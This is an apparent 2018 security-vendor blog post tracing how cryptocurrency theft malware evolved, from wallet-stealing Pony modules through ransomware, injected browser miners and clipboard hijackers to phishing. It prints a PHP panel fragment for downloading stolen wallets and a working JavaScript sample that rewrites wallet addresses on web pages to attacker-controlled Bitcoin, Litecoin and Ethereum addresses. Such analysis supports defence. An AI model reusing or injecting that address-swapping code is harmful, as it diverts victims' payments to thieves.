Cryptocurrency malware: an explosive mix!

Posted by Oscar Juárez - 04/05/2018

Since cryptocurrencies came on the scene in late 2008 and early 2009, new malware has gradually emerged that does its utmost to steal users’ wallets and cryptocurrencies. This malware, just like all the others, has steadily evolved, implementing new methods for achieving its goals, as we explain below.

Early cryptocurrency thefts were carried out with conventional stealer malware, such as the Pony family, to which a module had been added that could extract the wallet files, and the private keys they hold, stored on the victim's device. Shown below is a fragment of code from a control panel that lets the attacker download all the stolen wallets as a single zip file.

if ($admin_routine == 'download_wallet' && $admin_action == 'other') {
    // Send the zip download headers, then stream every stolen wallet file the panel has collected
    set_common_file_download_header('', 'application/zip');
    $pony_db->get_wallet_zip();
}

After a while, new and more effective methods cropped up and, as the reader may already know, we are referring to the notorious ransomware. Just to remind you, the main aim of this malware is to encrypt all of an infected machine's files and demand a ransom for the decryption key, usually payable in Bitcoin.

This type of malware has been, and still is, extremely successful, which is why countless variants have sprung up. But, as always happens, every new form of malware is met with new technology to mitigate it, so although cybercriminals have not discarded ransomware, they have moved on to other types as well.

Close on the heels of ransomware, samples began to emerge whose purpose was to inject a JavaScript miner into every web page the victim browses, so that an infected machine mines for the attacker the whole time the user is on the Internet.

In the early stages the injection was done by infecting the device itself but, later on, the same injections appeared in browser add-ons, and websites even began embedding miners themselves as an alternative source of revenue to the ads they normally display.

Nevertheless, as happened with ransomware, anti-mining measures were developed: many popular ad blockers began blocking the domains from which the mining JavaScript was loaded.

Criminals had to reinvent themselves again, and began injecting JavaScript into the browser on infected machines so that, when the user opens a page containing a cryptocurrency wallet address, the script replaces that address with one controlled by the attacker.

Shown below is a fragment of JavaScript from one such sample that tries to swap Litecoin, Ethereum and Bitcoin addresses. The checks are crude: checkBtc accepts any token of 26 to 35 alphanumeric characters with no Base58 alphabet or checksum validation, and a token is treated as Litecoin rather than Bitcoin purely because it starts with "L", so the script can just as easily overwrite unrelated text that happens to match.

function init() {
    var a = document.documentElement.innerHTML;
    // Strip HTML tags, collapse runs of spaces and keep only tokens longer than 24 characters
    var str = a.replace(/<.*?>/g, " ").replace(/ +/g, " ");
    str = str.split(" ").filter(function(a) {
        return (a = a.match(/(\w+)/)) && 24 < a[0].length;
    }).join(" ");
    var b = str.split(" ");
    // Each token is tried as a Bitcoin/Litecoin address, then as Ethereum; replace() with a string pattern only rewrites the first match, hence the double call
    for (a = 0; a < b.length; a++) {
        if (1 == checkBtc(b[a])) {
            var swap = "L" == b[a].substring(0, 1) ? "LKyKqLVy6KgyCYekftCHFTBLYiZyUvxtsG" : "17bH1SYLoBdGsBaDedPR2EE3JUt8oRS7qd"; // "L" prefix is treated as Litecoin, anything else as Bitcoin
            document.body.innerHTML = document.body.innerHTML.replace(b[a], swap);
            document.body.innerHTML = document.body.innerHTML.replace(b[a], swap);
        } else if (1 == checkEth(b[a])) {
            document.body.innerHTML = document.body.innerHTML.replace(b[a], "0xa05AeF9CA4828A71f84d284F7A25A7Aa6D2fe114");
            document.body.innerHTML = document.body.innerHTML.replace(b[a], "0xa05AeF9CA4828A71f84d284F7A25A7Aa6D2fe114");
        }
    }
}
// Ethereum: optional 0x prefix followed by exactly 40 hex digits
function checkEth(a) {
    return !!/^(0x)?[0-9a-f]{40}$/i.test(a) && (/^(0x)?[0-9a-f]{40}$/.test(a) || /^(0x)?[0-9A-F]{40}$/.test(a), !0);
}
// Bitcoin/Litecoin: 26 to 35 alphanumeric characters, no Base58 alphabet or checksum validation
function checkBtc(a) {
    return !(26 > a.length || 35 < a.length) && !!/^[A-Z0-9]+$/i.test(a);
}

Another variant that has appeared more recently performs the same kind of swap, but through the clipboard rather than the browser: when the user copies a wallet address in order to paste it somewhere, the malware replaces the clipboard contents with its own address. The recently discovered Evrial is one example.

Moreover, alongside all these families of cryptocurrency malware, several methods of stealing from users still rely on classic online fraud techniques, such as phishing backed by large spam campaigns, in which social engineering is used to trick users into entering their credentials for the various exchanges so that the attacker can empty the accounts behind them.

This is clearly just the beginning. New mitigations will be devised to stop users' cryptocurrencies from being stolen, but what other theft techniques and methods are waiting in the wings?
